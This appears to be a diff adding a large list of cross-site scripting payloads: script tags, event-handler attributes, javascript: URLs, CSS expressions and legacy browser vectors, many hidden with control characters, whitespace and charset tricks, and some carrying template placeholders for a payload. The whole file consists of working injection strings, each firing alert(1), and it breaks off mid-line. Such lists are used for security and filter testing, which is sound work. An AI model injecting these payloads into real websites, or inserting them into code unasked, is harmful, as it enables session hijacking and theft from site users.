@@ -0,0 +1,3807 @@ +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body 
onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet 
onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg 
onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" 
id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF 
+ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img 
src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> 
+"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body 
onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. 
/,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! 
foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= 
alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> 
+<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" 
to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG 